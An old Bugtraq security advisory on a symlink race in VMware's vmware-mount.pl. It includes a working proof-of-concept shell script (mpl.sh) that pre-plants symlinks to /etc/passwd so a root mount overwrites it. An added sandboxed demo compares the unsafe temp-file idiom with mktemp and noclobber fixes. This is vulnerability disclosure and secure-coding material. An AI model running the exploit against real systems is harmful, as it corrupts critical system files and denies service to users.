[20313] in bugtraq
VMware symlink problems
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Thu Apr 19 13:54:38 2001
Message-ID: <3ADDBB5D.205386BF@starzetz.de>
Date: Wed, 18 Apr 2001 18:05:49 +0200
Reply-To: Paul Starzetz <paul@STARZETZ.DE>
From: Paul Starzetz <paul@STARZETZ.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
1. Problem description
----------------------
There is a symlink vulnerability in the vmware-mount.pl script which comes
with the latest VMware.
2. Details
----------
While mounting virtual disk drives using the vmware-mount.pl script, a
temporary file named vmware-mount.pl.PID, where PID is the current pid of
the command, is created in an insecure manner: the name is predictable and
the file is opened without checking whether the path already exists. This
allows a local attacker to overwrite any local file once root mounts a
VMware virtual partition (mounting is usually done as root).
Example:
paul@ps:/tmp > id
uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
paul@ps:/tmp > ./mpl.sh
VMware local /etc/passwd DoS
By Ihq.
linking /etc/passwd to /tmp
[+] please wait for root to run vmware-mount.pl
after running vmware-mount.pl:
paul@ps:/tmp > id
uid=500 gid=100(users) Gruppen=100(users),90(firewall)
Obviously the passwd file has been overwritten:
paul@ps:/tmp > cat /etc/passwd
Nr Start Size Type Id Sytem
-- ---------- ---------- ---- -- ------------------------
1 63 2096577 BIOS C Win95 FAT32 (LBA)
I'm not sure if it is exploitable for privilege elevation.
3. Impact
---------
Local file corruption.
---------------------- mpl.sh ----------------------
#!/bin/bash
# Pre-plant a symlink named /tmp/vmware-mount.pl.<PID> for every PID that a
# root run of vmware-mount.pl could get, so that the temporary file it
# creates already points at /etc/passwd.
declare -i n
declare -i mx
n=2
mx=32767
echo
echo "VMware local /etc/passwd DoS"
echo "By Ihq."
echo
echo " linking /etc/passwd to /tmp"
# Walk the classic 16-bit PID range (n from 2 up to mx).
while test $n -lt $mx ; do
ln -s /etc/passwd /tmp/vmware-mount.pl.$n
n=$(($n + 1))
done
echo "[+] please wait for root to run vmware-mount.pl"
echo
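The following script is an added example and is not part of this advisory, of mpl.sh, or of VMware's vmware-mount.pl. It recreates, inside a private scratch directory created with mktemp -d, the pre-condition that the mpl.sh loop above sets up (a symlink wearing the predictable name vmware-mount.pl.PID, here pointing at a constructed "victim" file instead of /etc/passwd) and then runs three temporary-file idioms against it: the predictable-name redirection the advisory describes, the mktemp fix, and, going slightly beyond the text, a noclobber fallback for the case where a fixed name cannot be avoided. The function names, the scratch layout and the file contents are all assumptions made for the demo.

```shell
#!/bin/sh
# Added example; not part of the advisory, of mpl.sh, or of vmware-mount.pl.
# Everything below runs in a throwaway directory; names and contents are
# constructed for the demonstration.

# The idiom the advisory describes: a predictable name in a shared directory,
# opened with a plain '>' redirection, which truncates and writes whatever
# the path currently points at, symlink target included.
unsafe_tmp_write() {
    dir=$1
    f="$dir/vmware-mount.pl.$$"
    printf 'partition table\n' > "$f"
    echo "$f"
}

# Preferred fix: let mktemp pick an unguessable name and create it with
# O_CREAT|O_EXCL.  A link planted under any name an attacker could guess is
# never opened, and mktemp fails rather than reuse an existing path.
safe_tmp_write() {
    dir=$1
    f=$(mktemp "$dir/vmware-mount.XXXXXX") || return 1
    printf 'partition table\n' > "$f"
    echo "$f"
}

# Fallback when a fixed name cannot be avoided: with noclobber on, the '>'
# redirection refuses an existing path (a symlink to an existing file
# included) instead of truncating through it, so the write fails closed.
exclusive_tmp_write() {
    dir=$1
    f="$dir/vmware-mount.pl.$$"
    (set -C; printf 'partition table\n' > "$f") 2>/dev/null || return 1
    echo "$f"
}

# Scratch directory holding a constructed "victim" file and the planted link
# with the predictable name (the situation mpl.sh produces for /etc/passwd).
setup_scratch() {
    scratch=$(mktemp -d) || exit 2
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$scratch/victim"
    ln -s "$scratch/victim" "$scratch/vmware-mount.pl.$$"
    echo "$scratch"
}

# Prints 1 if the victim now holds the tool's output (clobbered), else 0.
victim_clobbered() {
    if grep -q 'partition table' "$1/victim"; then echo 1; else echo 0; fi
}

# Run one idiom against a fresh scratch directory and report the outcome.
run_demo() {
    s=$(setup_scratch)
    "$1" "$s" >/dev/null 2>&1 || true
    victim_clobbered "$s"
    rm -rf "$s"
}

unsafe_demo()    { run_demo unsafe_tmp_write; }
safe_demo()      { run_demo safe_tmp_write; }
exclusive_demo() { run_demo exclusive_tmp_write; }

# Stand-alone run: 1 for the unsafe idiom, 0 for the two hardened ones.
printf 'unsafe=%s safe=%s exclusive=%s\n' \
    "$(unsafe_demo)" "$(safe_demo)" "$(exclusive_demo)"
```

The mktemp variant is the one to reach for: it removes the guessable name and the exists-or-not race in a single call. The noclobber variant only protects the open itself; the name is still predictable, so it belongs only where the file layout is fixed by something else.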